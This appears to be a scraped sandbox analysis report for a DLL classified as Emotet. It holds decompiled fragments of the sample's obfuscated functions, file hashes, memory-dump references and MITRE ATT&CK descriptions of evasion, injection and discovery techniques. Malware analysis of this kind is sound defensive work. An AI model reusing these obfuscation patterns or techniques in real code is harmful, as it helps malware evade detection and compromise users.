API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
Instruction ID: d30a0df78d5a055f9e31e89a15f356801e01f2fa4460798a771ba8eab28337ea
Opcode Fuzzy Hash: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
Instruction Fuzzy Hash: B611277190221DFB9B04EFE89D468DFBFB4FF04308F108598E825B2211D3B19B149B91

Uniqueness

Uniqueness Score: -1.00%

Function 04E1D11A, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04E1D11A() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t39;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x78f5c7;
				_v32 = 0xa12bb9;
				_v28 = 0x4eca09;
				_v8 = 0x8b256f;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x4a7d0011;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00073d60;
				_v20 = 0x1e549a;
				_v20 = _v20 + 0xffffad33;
				_v20 = _v20 ^ 0x00134b4f;
				_v16 = 0x8dd9dd;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x0460bc3c;
				_v12 = 0x358059;
				_v12 = _v12 + 0xb97b;
				_v12 = _v12 ^ 0x003502df;
				E04E0EB52(_t39, _t39, 0x83891850, 0x1c, 0xa2289af1);
				ExitProcess(0);
			}

0x04e1d120
0x04e1d124
0x04e1d12b
0x04e1d132
0x04e1d139
0x04e1d140
0x04e1d144
0x04e1d14b
0x04e1d14f
0x04e1d156
0x04e1d15d
0x04e1d164
0x04e1d16b
0x04e1d172
0x04e1d176
0x04e1d17d
0x04e1d184
0x04e1d18b
0x04e1d1ac
0x04e1d1b6

APIs

ExitProcess.KERNEL32(00000000), ref: 04E1D1B6

Memory Dump Source

Source File: 00000008.00000002.336197242.0000000004E01000.00000020.00000001.sdmp, Offset: 04E00000, based on PE: true

Associated: 00000008.00000002.336185439.0000000004E00000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.336221870.0000000004E26000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e00000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction ID: 4324cd2df5545a11510700dc795b2c6165e7c3545eef493390a5a68c0065f3aa
Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction Fuzzy Hash: D01112B1C4030CEBDB54DFE5D94A6DEFBB0EB00708F108588D521B6250D3B89B489F90

Uniqueness

Uniqueness Score: -1.00%

Function 04E2061D, Relevance: 1.3, APIs: 1, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E04E2061D(void* __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				int _t53;
				WCHAR* _t56;

				_push(_a12);
				_t56 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04E1FE29(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xcd60b7;
				_v12 = 0x7257ab;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0x8f69;
				_v12 = _v12 * 0x4c;
				_v12 = _v12 ^ 0x410f7a13;
				_v8 = 0x7b4696;
				_v8 = _v8 + 0xffff4950;
				_v8 = _v8 | 0x2a0f624b;
				_v8 = _v8 * 0x3a;
				_v8 = _v8 ^ 0xa0f3ec54;
				_v20 = 0x8a2161;
				_v20 = _v20 + 0xffff45ea;
				_v20 = _v20 ^ 0x1b6c7fa6;
				_v20 = _v20 ^ 0x1be8dede;
				_v16 = 0xdcc12a;
				_v16 = _v16 + 0xb9f4;
				_v16 = _v16 + 0xffffcfef;
				_v16 = _v16 ^ 0x00d9de04;
				E04E0EB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
				_t53 = lstrcmpiW(_a4, _t56); // executed
				return _t53;
			}

0x04e20624
0x04e20627
0x04e20629
0x04e2062c
0x04e2062f
0x04e20630
0x04e20631
0x04e20636
0x04e2063d
0x04e20644
0x04e2064b
0x04e2064f
0x04e20667
0x04e2066a
0x04e20671
0x04e20678
0x04e2067f
0x04e2068b
0x04e2068e
0x04e20695
0x04e2069c
0x04e206a3
0x04e206aa
0x04e206b1
0x04e206b8
0x04e206bf
0x04e206c6
0x04e206d9
0x04e206e5
0x04e206eb

APIs

lstrcmpiW.KERNEL32(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04E206E5

Memory Dump Source

Source File: 00000008.00000002.336197242.0000000004E01000.00000020.00000001.sdmp, Offset: 04E00000, based on PE: true

Associated: 00000008.00000002.336185439.0000000004E00000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.336221870.0000000004E26000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e00000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction ID: feca2e45063665683c8d19b3617871b3c74bd182c54ceeb70e3db2509dc7e838
Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction Fuzzy Hash: E52113B1C01309ABCF14DFA9D9899DEBFB5FB10354F108198E529A6251D3B49B04CF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report nV5Wu77N8J.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre